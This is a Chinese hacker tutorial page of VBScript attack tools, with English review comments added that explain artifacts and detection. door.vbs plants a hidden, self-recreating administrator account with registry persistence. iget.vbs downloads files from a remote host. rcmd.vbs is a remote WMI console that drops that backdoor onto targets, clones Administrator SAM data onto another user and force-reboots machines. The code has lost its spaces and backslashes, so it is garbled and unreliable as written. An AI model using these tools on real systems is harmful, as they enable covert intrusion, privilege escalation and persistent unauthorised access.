黑客必须要知道的几个vbs文件代码

1.door.vbs

'***************

'door.vbsby黑嘿黑

'***************

' door.vbs: local backdoor installer. NOTE(review): the page extraction stripped every space and
' the backslashes inside registry paths; the code is kept byte-identical here and only comments
' are added. Read "HKLMSoftwareMicrosoft..." as HKLM\Software\Microsoft\... and so on.
dimwsh,FA,FSO

setfso=CreateObject("Scripting.FileSystemObject")

' File object for this very script (used below both to hide it and to register it for autostart)
SetFA=FSO.GetFile(WScript.scriptFullName)

' Attributes 34 = Hidden (2) + System (32): the script vanishes from a default Explorer view
FA.Attributes=34

setwsh=CreateObject("WScript.Shell")

' Creates local account IUSE_SERVER (name presumably chosen to resemble the IIS IUSR_ account)
' with password xyhack.91i.net and adds it to Administrators. Window style 0 = hidden, true =
' wait for completion. Artifacts: net.exe/net1.exe spawned by wscript.exe, new local admin in SAM.
wsh.run"netuserIUSE_SERVERxyhack.91i.net/add",0,true

wsh.run"netlocalgroupadministratorsIUSE_SERVER/add",0,true

' Persistence 1: HKLM\...\CurrentVersion\Run value "Win32" -> this script (FA's default property,
' its path). Re-runs at every logon.
wsh.Regwrite"HKLMSoftwareMicrosoftWindowsCurrentVersionRunWin32",""&FA&""

' Anti-forensics: forces the Folder Options "Show hidden files" policy CheckedValue to 0 so the
' hidden+system script cannot be revealed through the Explorer UI. (Statement wrapped across two
' lines by the page; it is one Regwrite call.)
wsh.Regwrite

"HKLMSoftwareMicrosoftWindowsCurrentVersionexplorerAdvancedFolderHiddenSHOWALLCheckedValue",0,"REG_DWORD"

' Persistence 2: Command Processor\AutoRun for the machine and the current user. cmd.exe executes
' this script every time it starts, so the account is re-created whenever an admin deletes it
' (the "immortal account" of the description). Detection: any non-empty AutoRun value is
' suspicious on its own; expect wscript.exe launched by cmd.exe shortly after every shell start.
wsh.regwrite"HKEY_LOCAL_MACHINESoftwareMicrosoftCommandProcessorAutoRun",""&FA&""

wsh.regwrite"HKEY_CURRENT_USERSoftwareMicrosoftCommandProcessorAutoRun",""&FA&""

功能:在本机添加一个“不死”的隐藏管理员帐号(随 cmd 启动而重新创建),并在 Windows 下隐藏脚本文件本身——即在本机植入后门。

使用:直接运行。

2.ntlm.vbs

'***************

'ntlm.vbsby黑嘿黑

'***************

' ntlm.vbs: rewrites two Telnet Server settings straight from the command line. No argument
' validation at all: a missing argument raises an unhandled script error, a non-numeric one fails
' in RegWrite. Backslashes in the key paths were lost in this listing.
dimwsh

setwsh=CreateObject("WScript.Shell")

' HKLM\Software\Microsoft\TelnetServer\1.0\NTLM <- Arguments(0). This value selects the telnet
' service's authentication mode; as commonly documented for the Windows 2000/XP telnet server,
' 0 turns NTLM off and falls back to a plaintext password prompt (verify on the target build).
wsh.regwrite"HKLMSoftwareMicrosoftTelnetServer1.0NTLM",WScript.Arguments(0),"REG_DWORD"

' ...\TelnetPort <- Arguments(1): moves the listener off 23/tcp. Both writes need administrator
' rights on the box, and the service presumably has to be restarted before they take effect.
wsh.regwrite"HKLMSoftwareMicrosoftTelnetServer1.0TelnetPort",WScript.Arguments(1),"REG_DWORD"

功能:自定义 Telnet 服务的 NTLM 认证模式和监听端口(直接改写注册表)。

使用:D:\>ntlm.vbs <NTLM值> <端口>(第一个参数写入 NTLM 键,第二个写入 TelnetPort 键)

3.iget.vbs

'***************************

'iget.vbsModby黑嘿黑

'***************************

' iget.vbs: minimal download cradle — fetches a URL with Microsoft.XMLHTTP and writes the response
' body to disk through ADODB.Stream. No proxy, TLS or error handling; the example usage is plain
' HTTP. Detection: cscript/wscript loading msxml + ADODB.Stream and then writing a file is a
' well-known pattern. Spaces were lost in this listing (e.g. "SaveToFileLCase" = SaveToFile LCase).
SetxPost=CreateObject("Microsoft.XMLHTTP")

' Synchronous GET (third argument 0 = async false). LCase() lower-cases the whole URL including
' the path, which breaks downloads from case-sensitive servers — a quirk, not a feature.
xPost.Open"GET",LCase(WScript.Arguments(0)),0

xPost.Send()

SetsGet=CreateObject("ADODB.Stream")

' Mode 3 = adModeReadWrite, Type 1 = adTypeBinary (ADO constants)
sGet.Mode=3

sGet.Type=1

sGet.Open()

sGet.Write(xPost.responseBody)

' SaveToFile ..., 2 = adSaveCreateOverWrite: silently replaces an existing file; the target name
' is lower-cased too. The HTTP status is never checked, so an error page gets saved as the file.
sGet.SaveToFileLCase(WScript.Arguments(1)),2

功能:命令行下通过 HTTP 下载文件并保存到本地(无 HTTPS 校验,不检查 HTTP 状态码)。

使用:D:\>iget.vbs http://xyhack.91i.net/vbs.rar vbs.rar(第一个参数为 URL,第二个为保存的文件名)

4.rcmd.vbs

'***************

'rcmd.vbsby黑嘿黑

'***************

' rcmd.vbs v1.05: interactive remote-administration / intrusion console over WMI (DCOM: 135/tcp
' plus a dynamic RPC port). The next line swallows every error for the whole script, so most of
' the "OK!" messages printed later are NOT evidence that an action succeeded. The listing lost
' all spaces and backslashes ("root/cimv2" is written with a slash and survived).
onerrorresumenext

setoutstreem=wscript.stdout

setinstreem=wscript.stdin

' Re-launches under cscript when started by double-click (wscript.exe has no StdIn/StdOut).
' Defect: the wscript instance keeps running instead of quitting, so two copies exist; its
' console I/O simply fails silently under the resume-next.
if(lcase(right(wscript.fullname,11))="wscript.exe")then

setobjShell=wscript.createObject("wscript.shell")

objShell.Run("cmd.exe/kcscript//nologo"&chr(34)&wscript.scriptfullname&chr(34))

endif

ifwscript.arguments.count<3then

usage()

wscript.echo"Notenoughparameters."

wscript.quit

endif

' Target IP, user name and password come as plain command-line arguments: they end up in shell
' history, process listings and any command-line auditing on the operator's own machine.
ipaddress=wscript.arguments(0)

username=wscript.arguments(1)

password=wscript.arguments(2)

usage()

outstreem.write"Conneting"&ipaddress&"...."

' Remote WMI connection to root\cimv2 with explicit credentials. Target side: a network logon for
' that user plus wmiprvse.exe activity — the same telemetry that catches any WMI lateral movement.
setobjlocator=createobject("wbemscripting.swbemlocator")'20

setobjswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)

' Enables privileges on the connection. 23/18/7/11 look like the WbemPrivilegeEnum values
' RemoteShutdown / Shutdown / Security / SystemTime — consistent with what reboot(), clog() and
' the clock trick in ca() need — but verify against the enum before relying on that reading.
objswbemservices.security_.privileges.add23,true

objswbemservices.security_.privileges.add18,true

objswbemservices.security_.privileges.add7,true

objswbemservices.security_.privileges.add11,true

' Defect: errornumber is never assigned at top level (it is only a parameter name inside
' showerror/showerroronly), so it is Empty here; Empty<>0 is False and "OK!" is printed even when
' connectserver failed. The real status is in err.number, which is never consulted.
iferrornumber<>0then

wscript.echo"Error!"

callmain()

else

wscript.echo"OK!"

endif

' main() is the menu; every command function ends by calling main() again, so the console is a
' never-unwinding recursion. Control only returns here after a menu choice that matches no case.
callmain()

'***********************************************************

' door(): plants the door.vbs backdoor on the target. It builds one long cmd line made of
' "echo <vbs line> >> %windir%\system32\svrer.vbs" redirections, runs it through
' Win32_Process.Create, waits, then runs the dropped script with cscript.
' Artifacts left on the target: %windir%\system32\svrer.vbs (hidden+system),
' %windir%\system32\SYSTEM.bat (hidden), local admin IUSE_SERVER, Run value "Win32",
' Command Processor\AutoRun under HKLM and HKCU, and four "at" jobs (20:00/20:10/20:20/20:30)
' running SYSTEM.bat — at.exe jobs execute as LocalSystem. Path backslashes were lost in the
' listing, and two of the long statements below were wrapped onto extra lines by the page.
functiondoor()

outstreem.write"Creatingtheblankdoor.."

setobjinstproc=objswbemservices.get("win32_process")

' Doubled quotes inside this VBScript string become literal quotes in the dropped file.
cmddoor="cmd/cechodimwsh,FA,FSO,t>%windir%system32svrer.vbs"_

&"&&echosetfso=CreateObject(""Scripting.FileSystemObject"")>>%windir%system32svrer.vbs"_

&"&&echoSetFA=FSO.GetFile(WScript.scriptFullName)>>%windir%system32svrer.vbs"_

' Dropped script hides itself: Hidden (2) + System (32)
&"&&echoFA.Attributes=34>>%windir%system32svrer.vbs"_

' SYSTEM.bat: re-adds the admin account and re-hides itself; re-run by the at jobs scheduled below
&"&&echosett=fso.CreateTextFile(""%windir%system32SYSTEM.bat"",true)>>%windir%system32svrer.vbs"_

&"&&echot.WriteLine(""netuserIUSE_SERVERxyhack.91i.net/add"")>>%windir%system32svrer.vbs"_

&"&&echot.WriteLine(""netlocalgroupadministratorsIUSE_SERVER/add"")>>%windir%system32svrer.vbs"_

&"&&echot.WriteLine(""Attrib+h%windir%system32SYSTEM.bat"")>>%windir%system32svrer.vbs"_

&"&&echot.Close>>%windir%system32svrer.vbs"_

&"&&echosetwsh=CreateObject(""WScript.Shell"")>>%windir%system32svrer.vbs"_

' Same account creation again, executed immediately when svrer.vbs runs
&"&&echowsh.run""netuserIUSE_SERVERxyhack.91i.net/add"",0,true>>%windir%system32svrer.vbs"_

&"&&echowsh.run""netlocalgroupadministratorsIUSE_SERVER/add"",0,true>>%windir%system32svrer.vbs"_

' Run key "Win32" -> svrer.vbs (statement continues on the next non-blank line)
&"&&echowsh.Regwrite

""HKLMSoftwareMicrosoftWindowsCurrentVersionRunWin32"",""%windir%system32svrer.vbs"">>%windir%system32svrer.vbs"_

' Disables the "Show hidden files" toggle in Folder Options (statement wrapped over three lines)
&"&&echowsh.Regwrite

""HKLMSoftwareMicrosoftWindowsCurrentVersionexplorerAdvancedFolderHiddenSHOWALLCheckedValue"",0,""REG_DWORD"">>%win

dir%system32svrer.vbs"_

' Command Processor\AutoRun (HKLM, then HKCU): svrer.vbs runs on every cmd.exe start
&"&&echowsh.regwrite""HKEY_LOCAL_MACHINESoftwareMicrosoftCommand

ProcessorAutoRun"",""%windir%system32svrer.vbs"">>%windir%system32svrer.vbs"_

&"&&echowsh.regwrite""HKEY_CURRENT_USERSoftwareMicrosoftCommand

ProcessorAutoRun"",""%windir%system32svrer.vbs"">>%windir%system32svrer.vbs"_

' Four at jobs re-running SYSTEM.bat every evening — visible with "at" / in the Scheduled Tasks folder
&"&&echowsh.run""cmd/cat20:00,20:10,20:20,20:30%windir%system32SYSTEM.bat"",0,true

>>%windir%system32svrer.vbs"

objinstproc.create(cmddoor)

showerror(err.number)

' Fixed 1.5 s wait for the dropper to finish; on a slow target the cscript below runs before the
' file is complete and fails silently (errors are suppressed script-wide).
Wscript.Sleep(1500)

outstreem.write"Runingtheblankdoor.."

objinstproc.create("cmd/ccscript%windir%system32svrer.vbs")

showerror(err.number)

callmain()

endfunction

'***********************************************************

' ca(): "clone account". Turns an ordinary local user into an administrator without changing
' group membership, by copying the SAM "F" value of RID 0x1F4 (500, the built-in Administrator)
' over the target user's own SAM entry. HKLM\SAM is writable only by SYSTEM, so the write is
' delegated to an "at" job (runs as LocalSystem) after the target's clock is pushed to just before
' the job time. Side effects on the target: %temp%\ca.vbs and %temp%\getsys.vbs, an at job, a
' ~1 s clock jump (time-change audit event, gap in every timestamped log), the Schedule service
' possibly switched on, registry value HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings\caflag
' and a password change on the user. Detection: diff each user's SAM F value against RID 500's;
' alert on time changes and at.exe jobs. Backslashes in paths were lost in this listing.
functionca()

Wscript.Echo"enterthecausername:"

causername=WScript.StdIn.Readline()

Wscript.Echo"enterthecapassword:"

capassword=WScript.StdIn.Readline()

outstreem.write"GettingSIDof"&causername&"...."

' WQL built by string concatenation from operator input (a quote in the name breaks the query)
setcolinstsid=objswbemservices.execquery("select*fromwin32_useraccountwherename="&chr(34)&causername&chr(34))

foreachobjinstsidincolinstsid

strsid=objinstsid.sid

' RID = last "-" group of the SID; as hex, zero-padded to 8 digits = the user's SAM sub-key name
sidflag=right(strsid,len(strsid)-instrrev(strsid,"-"))

strflag=cstr(hex(sidflag))

regname=string(8-len(strflag),"0")&strflag

next

' No match leaves strsid Empty; Empty = "" is True in VBScript, so the error branch is reached
ifstrsid=""then

wscript.echo"Error."&vbcrlf&"Usernameisnotexist."

callmain()

else

wscript.echo"OK!"

endif

outstreem.write"Prepairing.."

setobjinstproc=objswbemservices.get("win32_process")

showerroronly(err.number)

' ca.vbs (dropped in %temp%): read F of Users\000001F4 (Administrator) via StdRegProv, write it
' under the target user's key, then set caflag=1 as a completion signal. The "?name&" fragment
' below is extraction damage — presumably "&regname&", the key computed above, which is otherwise
' unused. The Administrator key name also appears to have lost a leading zero in the listing.
' ^&h80000002 is HKEY_LOCAL_MACHINE with the & escaped for cmd.
cmdline="cmd/cechosetoreg=getobject(""winmgmts:rootdefault:stdregprov"")>%temp%ca.vbs"_

&"&&echooreg.getbinaryvalue^&h80000002,""SAMSAMDomainsAccountUsers00001F4"",""F"",uvalue>>%temp%ca.vbs"_

&"&&echooreg.setbinaryvalue^&h80000002,""SAMSAMDomainsAccountUsers"?name&""",""F"",uvalue>>%temp%ca.vbs"_

&"&&echosetsh=createobject(""wscript.shell"")>>%temp%ca.vbs"_

&"&&echosh.regwrite""HKLMSOFTWAREMicrosoftWindowsScriptHostSettingscaflag"",""1"">>%temp%ca.vbs"

objinstproc.create(cmdline)

showerroronly(err.number)

' getsys.vbs: save the current time, schedule "cscript ca.vbs" at 23:59 via at (LocalSystem),
' set the clock to 23:58:59.90, sleep 1.1 s so the job fires, then restore the saved time.
' Needs SeSystemtimePrivilege on the target (enabled on the WMI connection at startup).
cmdline="cmd/cechoatime=time>%temp%getsys.vbs"_

&"&&echosetsh=createobject(""wscript.shell"")>>%temp%getsys.vbs"_

&"&&echosh.run""cmd/cat23:59cscript%temp%ca.vbs"",0,true>>%temp%getsys.vbs"_

&"&&echosh.run""cmd/ctime23:58:59.90"",0,true>>%temp%getsys.vbs"_

&"&&echowscript.sleep(1100)>>%temp%getsys.vbs"_

&"&&echosh.run""cmd/ctime""^&atime,0,true>>%temp%getsys.vbs"

objinstproc.create(cmdline)

showerror(err.number)

outstreem.write"Processing."

' at jobs need the Schedule service: it is enabled/started if necessary and restored afterwards
' (flag1 = start mode changed, flag2 = service started by us)
setcolinstsvr=objswbemservices.execquery("select*fromwin32_servicewherename='schedule'")

showerroronly(err.number)

foreachobjinstsvrincolinstsvr

flag1=0

flag2=0

ifobjinstsvr.startmode="Disabled"then

objinstsvr.changestartmode("Manual")

flag1=1

endif

' Typo: "flase" is an undeclared variable, i.e. Empty. It works by accident — a Boolean compares
' equal to Empty only when it is False — so the service is started when it is not running.
ifobjinstsvr.started=flasethen

errnumber=objinstsvr.startservice()

flag2=1

endif

showerroronly(err.number)

objinstproc.create("cmd/ccscript%temp%getsys.vbs")

showerroronly(err.number)

' Poll caflag for up to 20 x 500 ms = 10 s, reading the target's registry through root\default
setobjinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")

fori=1to20

objinstreg.getstringvalue&h80000002,"SOFTWAREMicrosoftWindowsScriptHostSettings","caflag",svalue

ifsvalue="1"then

exitfor

else

wscript.sleep(500)

endif

next

' "net user <name> <password>" — sets the cloned account's password (spaces lost in the listing)
objinstproc.create("netuser"&causername&""&capassword)

ifflag1thenobjinstsvr.changestartmode("Disabled")

ifflag2thenobjinstsvr.stopservice()

next

ifsvalue<>"1"then

wscript.echo"Error."&vbcrlf&"Waitingtimeout."

else

showerror(err.number)

endif

' Cleanup removes the two dropped scripts and the flag value, but not the at job entry or the
' audit trail of the clock change.
outstreem.write"CleanUp.."

objinstproc.create("cmd/cdel%temp%ca.vbs")

showerroronly(err.number)

objinstproc.create("cmd/cdel%temp%getsys.vbs")

showerroronly(err.number)

ifsvalue="1"thenobjinstreg.deletevalue&h80000002,"SOFTWAREMicrosoftWindowsScriptHostSettings","caflag"

showerror(err.number)

callmain()

endfunction

' showerroronly(errornumber): if the argument is non-zero, prints "Error 0x<hex>" plus the
' description and jumps back to the main menu (never returns to the caller); otherwise prints a
' progress dot. Note it formats err.number, not its argument, so a caller passing a method's
' return code gets whatever err.number happens to hold.
functionshowerroronly(errornumber)

iferrornumberThen

wscript.echo"Error0x"&cstr(hex(err.number))&"."

iferr.description<>""then

wscript.echo"Errordescription:"&err.description&"."

endif

callmain()

else

outstreem.write"."

endif

endfunction

'***********************************************************

' share(): sub-menu for the Win32_Share operations (list / create / delete). There is no
' Case Else, so an unrecognised choice simply returns to whoever called share().
functionshare()

Wscript.Echostring(18,"-")

Wscript.Echo"0.返回CMD>="

wscript.echo"1.列出共享信息:="

Wscript.Echo"2.创建共享="

Wscript.Echo"3.删除共享="

Wscript.Echostring(18,"-")

Wscript.Echo"pleasechosetheparameter:"

parameters=WScript.StdIn.Readline()

SelectCaseparameters

case"quit","0"

main()

case"list","1"

listshare()

case"open","2"'40

openshare()

case"close","3"

closeshare()

endSelect

endfunction

' listshare(): enumerates Win32_Share on the target and prints Caption / Name / Path, one share per
' line, then returns to the share sub-menu. The "Successfully" message is printed even if the query
' failed, because errors are suppressed script-wide.
functionlistshare()

outstreem.write"ListingtheNetsharefrom"&ipaddress&"...."

SetcolShares=objswbemservices.ExecQuery("Select*fromWin32_Share")

showerror(err.number)'50

wscript.echo_

("Caption"&chr(9)&chr(9)&"Name:"&chr(9)&chr(9)&"Path")

ForeachobjShareincolShares

wscript.echo_

(objShare.Caption&chr(9)&objShare.Name&chr(9)&chr(9)&objShare.Path)

Next

wscript.echovbcrlf&"AllSharehavebeenlistedSuccessfully!"

callshare()

endfunction

' openshare(): creates a new SMB share on the target via Win32_Share.Create. Type 0 = disk drive
' share, at most 25 concurrent connections, description "默认共享" ("default share", to blend in
' with the built-in admin shares). No access descriptor is passed, so the share gets whatever
' default permissions the OS applies. Defect: errReturn is never checked — "Created Successfully"
' is printed unconditionally.
functionopenshare()

wscript.echo"Enterthepath:"'70

path=WScript.StdIn.Readline()

wscript.echo"Enterthename:"

sname=WScript.StdIn.Readline()

ConstFILE_SHARE=0

ConstMAXIMUM_CONNECTIONS=25

SetobjNewShare=objswbemservices.Get("Win32_Share")

errReturn=objNewShare.Create_

(path,sname,FILE_SHARE,_

MAXIMUM_CONNECTIONS,"默认共享")

wscript.echo"ThenSharehavebeenCeatedSuccessfully!"

callshare()

endfunction

' closeshare(): deletes every Win32_Share whose Name matches the entered string. The WQL filter is
' built by concatenation, so a name containing a single quote breaks the query (operator input,
' not an external attack surface).
functioncloseshare()

wscript.echo"PleseEnterThename:"

kname=WScript.StdIn.Readline()

outstreem.write"killingthe"&kname&"...."

SetcolShares=objswbemservices.ExecQuery_

("Select*fromWin32_ShareWhereName="&"'"&kname&"'")

ForEachobjShareincolShares

objShare.Delete

Next

showerror(err.number)

callshare()

endfunction

'***********************************************************

' listsvr(): lists every Win32_Service with State, StartMode and PathName in tab-separated
' columns. NOTE: the menu in main() calls "listlistsvr()", a name that does not exist, so this
' function is effectively unreachable from the console (the failed call is swallowed).
functionlistsvr()

outstreem.write"ListingtheServicefrom"&ipaddress&"...."

SetcolListOfServices=objswbemservices.ExecQuery_

("Select*fromWin32_Service")

showerror(err.number)

wscript.echo_

("Name"&chr(9)&chr(9)&"State"&chr(9)&chr(9)&"Mode"&chr(9)&"PathName")

ForEachobjServiceincolListOfServices

' Extra tab for short names keeps the columns roughly aligned
iflen(objService.name)<8then

strname=objService.name&chr(9)

else

strname=objService.name

endif

wscript.echo_

(strname&chr(9)&objService.State&chr(9)&chr(9)&objService.StartMode&chr(9)&objService.PathName)

Next

wscript.echovbcrlf&"AllServiceshavebeenlistedSuccessfully!"

callmain()

endfunction

'************************************************************

' reboot(): forced restart of the target through Win32_OperatingSystem.Win32Shutdown(6).
' Flag 6 = Reboot (2) + Forced (4): applications are killed without a chance to save. Requires the
' Shutdown/RemoteShutdown privileges enabled on the WMI connection at startup.
functionreboot()

outstreem.write"Now,restartingtarget...."

strwqlquery="select*fromwin32_operatingsystemwhereprimary='true'"

setcolinstances=objswbemservices.execquery(strwqlquery)

foreachobjinstanceincolinstances

objinstance.win32shutdown(6)

next

showerror(err.number)

callmain()

endfunction

'*************************************************************

' inf(): host reconnaissance. Dumps OS, CPU, memory, BIOS, display, disk, NIC, hotfix and
' installed-application information from the target over WMI, using the helpers objget(), wnl(),
' wfl(), wsp(), timeformat() and sizeformat() defined later in the file. Everything is read-only;
' the only extra connection is a second ConnectServer to root\default for the registry read at
' the end. Output goes to the console only ("of" in wnl() is never set).
functioninf()

outstreem.write"GettingInfomationfrom"&ipaddress&"...."

' objget() returns the last instance of the class, adequate for singleton classes like these
setobj1=objget("win32_computersystem")

showerror(err.number)

wscript.echo""&vbcrlf

setobj2=objget("win32_operatingsystem")

setcol3=objswbemservices.instancesof("win32_processor")

setobj4=objget("win32_logicalmemoryconfiguration")

setobj5=objget("win32_bios")

setobj6=objget("win32_displayconfiguration")

setcol7=objswbemservices.instancesof("win32_diskdrive")

setcol8=objswbemservices.instancesof("win32_logicaldisk")

setcol9=objswbemservices.instancesof("win32_networkadapterconfiguration")

setcol10=objswbemservices.instancesof("win32_quickfixengineering")

wnl"OSInfo:"

wnl"ComputerName:"&obj1.name

wnl"UserName:"&obj1.username

wnl"Domain:"&obj1.domain

' DomainRole mapping (0..5) as labelled by the author; 5 is the primary domain controller
domainrole=""

selectcaseobj1.domainrole

case0

domainrole="Workstation"

case1

domainrole="MemberWorkstation"

case2

domainrole="Server"

case3

domainrole="MemberServer"

case4

domainrole="BackupDomainController"

case5

domainrole="MainDomainController"

endselect

withobj2

wnl"DomainRole:"&domainrole

wnl"Caption:"&.caption

wnl"Organization:"&.organization

wnl"RegisteredUser:"&.registereduser

' CIM datetime strings are reformatted by timeformat()
wnl"InstallDate:"&timeformat(.installdate)

wnl"LastBootUpTime:"&timeformat(.lastbootuptime)

wnl"WindowsDirectory:"&.windowsdirectory

wnl"SystemDirectory:"&.systemdirectory

wnl"BootDevice:"&.bootdevice

wnl"CountryCode:"&.countrycode

wnl"CSName:"&.csname

wnl"Description:"&.description

wnl"Manufacturer:"&.manufacturer

wnl"SerialNumber:"&.serialnumber

wnl"Version:"&.version

wnl"SystemType:"&obj1.systemtype

wnl"SystemStartupDelay:"&obj1.systemstartupdelay&"s"

' Boot options array: first entry inline, the rest indented on their own lines
wnl"SystemStartupOptions:"&obj1.systemstartupoptions(0)

fori=1toubound(obj1.systemstartupoptions)

wnlspace(28)&obj1.systemstartupoptions(i)

next

endwith

wnlvbcrlf&"ProcessorInfo:"

wnl"NumberOfProcessors:"&obj1.numberofprocessors

foreachobj3incol3

withobj3

wnl"DeviceID:"&.deviceid

wnl"Name:"&.name

wnl"CurrentClockSpeed:"&.currentclockspeed&"MHz"

wnl"Description:"&.description

wnl"ExtClock:"&.extclock&"MHz"

wnl"L2CacheSize:"&.l2cachesize&"KB"

wnl"L2CacheSpeed:"&.l2cachespeed&"MHz"

wnl"ProcessorId:"&.processorid

wnl"Manufacturer:"&.manufacturer

wnl"SocketDesignation:"&.socketdesignation

wnl"AddressWidth:"&.addresswidth&"Bit"

wnl"DataWidth:"&.datawidth&"Bit"

endwith

next

' Memory figures are divided by 1024 (KB -> MB per the labels); cint() overflows above 32767 MB
withobj4

wnlvbcrlf&"MemoryInfo:"

wnl"TotalPhysicalMemory:"&cint(.totalphysicalmemory/1024)&"MB"

wnl"FreePhysicalMemory:"&cint(obj2.freephysicalmemory/1024)&"MB"

wnl"TotalPageFileSpace:"&cint(.totalpagefilespace/1024)&"MB"

wnl"TotalVirtualMemory:"&cint(.totalvirtualmemory/1024)&"MB"

wnl"AvailableVirtualMemory:"&cint(.availablevirtualmemory/1024)&"MB"

endwith

wnlvbcrlf&"BIOSInfo:"

wnl"Description:"&obj5.description

wnl"CurrentLanguage:"&obj5.currentlanguage

wnl"Version:"&obj5.version

wnl"Manufacturer:"&obj5.manufacturer

withobj6

wnlvbcrlf&"DisplayConfiguration:"

wnl"Caption:"&.caption

wnl"DeviceName:"&.devicename

wnl"DriverVersion:"&.driverversion

wnl"DisplayFrequency:"&.displayfrequency&"Hz"

wnl"BitsPerPel:"&.bitsperpel&"Bit"

wnl"Pels:"&.pelswidth&"x"&.pelsheight

endwith

wnlvbcrlf&"DiskInfo:"

foreachobj7incol7

withobj7

wnl"DeviceID:"&.deviceid

wnl"Caption:"&.caption

wnl"InterfaceType:"&.interfacetype

wnl"SCSIBus:"&.scsibus

wnl"SCSILogicalUnit:"&.scsilogicalunit

wnl"SCSIPort:"&.scsiport

wnl"SCSITargetId:"&.scsitargetid

' "KB" is a mislabel: SectorsPerTrack is a count, not a size
wnl"SectorsPerTrack:"&.sectorspertrack&"KB"

wnl"Partitions:"&.partitions

wnl"Size:"&sizeformat(.size)

endwith

next

' Logical-disk table header; spaces inside the literals were lost in the listing
str="Volume"+space(2)+"Type"+space(8)+"Format"+space(4)

str=str+"Size"+space(6)+"Free"+space(12)+"Label"

wnlstr

foreachobj8incol8

withobj8

drivetype=""

selectcase.drivetype

case0

drivetype="Unknow"

case1

drivetype="NoRootDir"

case2

drivetype="Removable"

case3

drivetype="Fixed"

case4

drivetype="Network"

case5

drivetype="CD-ROM"

case6

drivetype="RAM"

endselect

' Free-space percentage only when both figures are present (Null for media-less drives)
strpercent=""

if.size<>""and.freespace<>""then

strpercent="("&formatpercent(.freespace/.size,0)&")"

endif

str=""&wsp(.caption,8)&wsp(drivetype,12)&wsp(.filesystem,10)&wsp(sizeformat(.size),10)

str=str&wsp(sizeformat(.freespace)&strpercent,16)&.volumename

wnlstr

endwith

next

' Only IP-enabled adapters; array-valued properties are flattened by wfl()
wnlvbcrlf&"NICInformaton:"

foreachobj9incol9

withobj9

if.IPEnabledthen

wnl"Index:"&.index

wnl"Description:"&.description

wnl"DHCPEnabled:"&.dhcpenabled

wnl"DHCPServer:"&.dhcpserver

wnl"DNSHostName:"&.dnshostname

wnl"DNSServerSearchOrder:"&wfl(.dnsserversearchorder)

wnl"WINSPrimaryServer:"&.winsprimaryserver

wnl"IPAddress:"&wfl(.ipaddress)

wnl"MACAddress:"&.macaddress

wnl"DefaultIPGateway:"&wfl(.defaultipgateway)

wnl"IPSubnet:"&wfl(.ipsubnet)

wnl"IPFilterSecurityEnabled:"&.ipfiltersecurityenabled

wnl"IPSecPermitIPProtocols:"&wfl(.ipsecpermitipprotocols)

wnl"IPSecPermitTCPPorts:"&wfl(.ipsecpermittcpports)

wnl"IPSecPermitUDPPorts:"&wfl(.ipsecpermitudpports)

endif

endwith

next

wnlvbcrlf&"HotFixesInfo:"

foreachobj10incol10

wnl"HotFixID:"&obj10.hotfixid

wnl"FixComments:"&obj10.fixcomments

wnl"InstallDate:"&obj10.installdate

wnl"ServicePackInEffect:"&obj10.servicepackineffect

next

' Installed applications: DisplayName of every sub-key of HKLM\SOFTWARE\...\Uninstall, read
' through StdRegProv on a second connection to root\default
wnlvbcrlf&"Applications:"

setobjswb1=objlocator.connectserver(ipaddress,"root/default",username,password)

setobj11=objswb1.get("stdregprov")

HKLM=&h80000002

keypath="SOFTWAREMicrosoftWindowsCurrentVersionUninstall"

obj11.enumkeyHKLM,keypath,keyarray

' "str" is reused here as an array after serving as a string above
redimstr(ubound(keyarray)+1)

j=0

fori=0toubound(keyarray)

obj11.getstringvalueHKLM,keypath+keyarray(i),"displayname",strvalue

ifstrvalue<>""then

str(j)=strvalue

j=j+1

endif

next

' Case-insensitive bubble sort (strcomp mode 1); the inner loop reads str(k+1) up to str(j),
' one past the last filled element, which is why the array was sized one larger
ifj>1then

fori=0toj-1

fork=0toj-i-1

ifstrcomp(str(k),str(k+1),1)=1then

strtemp=str(k+1)

str(k+1)=str(k)

str(k)=strtemp

endif

next

next

endif

fori=0toj-1

wnl""&str(i)

next

wscript.echo""&vbcrlf

' Defect: "&ipaddress&" sits inside the string literal, so the text is printed verbatim
wscript.echo"TheInfomationfrom&ipaddress&hadbeenlistedSuccessfully!"

callmain()

endfunction

' wnl(msg): "write line" — echoes msg to the console and, if a file object named "of" exists,
' also appends it there. Nothing in this file ever assigns "of", so the file branch is dead code;
' if it ever ran, showerror() without its required argument would itself raise an error.
subwnl(msg)

wscript.echomsg

ifisobject(of)then

onerrorresumenext

of.writelinemsg

showerror()

onerrorgoto0

endif

endsub

' wfl(obj): flattens an array (WMI array-valued property) into one string. The separator literal
' shows as "" here because the listing lost its spaces; it was presumably a single space.
' A Null property (not an array) makes ubound() fail, which the script-wide resume-next hides.
functionwfl(byrefobj)

str=""

fori=0toubound(obj)

str=str&obj(i)&""

next

wfl=str

endfunction

' wsp(msg, num): fixed-width column formatter. Truncates msg to num-1 characters and pads it with
' spaces to exactly num characters; an empty (or Null, which makes the test False) msg yields num
' spaces. Note that a value longer than num-1 is cut silently.
functionwsp(msg,num)

ifmsg<>""then

msg=left(msg,num-1)

wsp=msg&space(num-len(msg))

else

wsp=space(num)

endif

endfunction

' timeformat(msg): reformats a CIM datetime string (yyyymmddHHMMSS...) as yyyy/mm/dd HH:MM:SS.
' The "" between the date and time parts was a space in the original (lost in this listing).
' The UTC offset at the end of the CIM string is discarded.
functiontimeformat(msg)

timeformat=left(msg,4)&"/"&mid(msg,5,2)&"/"&mid(msg,7,2)&""&mid(msg,9,2)&":"&mid(msg,11,2)&":"&mid(msg,13,2)

endfunction

' sizeformat(msg): byte count -> "x MB" (1 decimal) or, above 1024 MB, "x GB" (2 decimals).
' Returns Empty for "" (and for Null, since Null<>"" is not True).
functionsizeformat(msg)

ifmsg<>""then

size=msg/1048576

ifsize>1024then

sizeformat=round(size/1024,2)&"GB"

else

sizeformat=round(size,1)&"MB"

endif

endif

endfunction

' objget(msg): returns the LAST instance of WMI class msg on the connected target (the loop keeps
' overwriting obj). Intended for singleton classes; for multi-instance classes it silently drops
' all but one. Returns Empty/Nothing when there are no instances.
functionobjget(msg)

setcol=objswbemservices.instancesof(msg)

foreachobjxincol

setobj=objx

next

setobjget=obj

endfunction

'******************************************

' command(): prompt for the remote-execution loop; run() reads the line and calls back here, so
' the pair recurses until the operator types exit/quit/0.
functioncommand()

wscript.echo"PleseEnterTheCommand:"

callrun()

endfunction

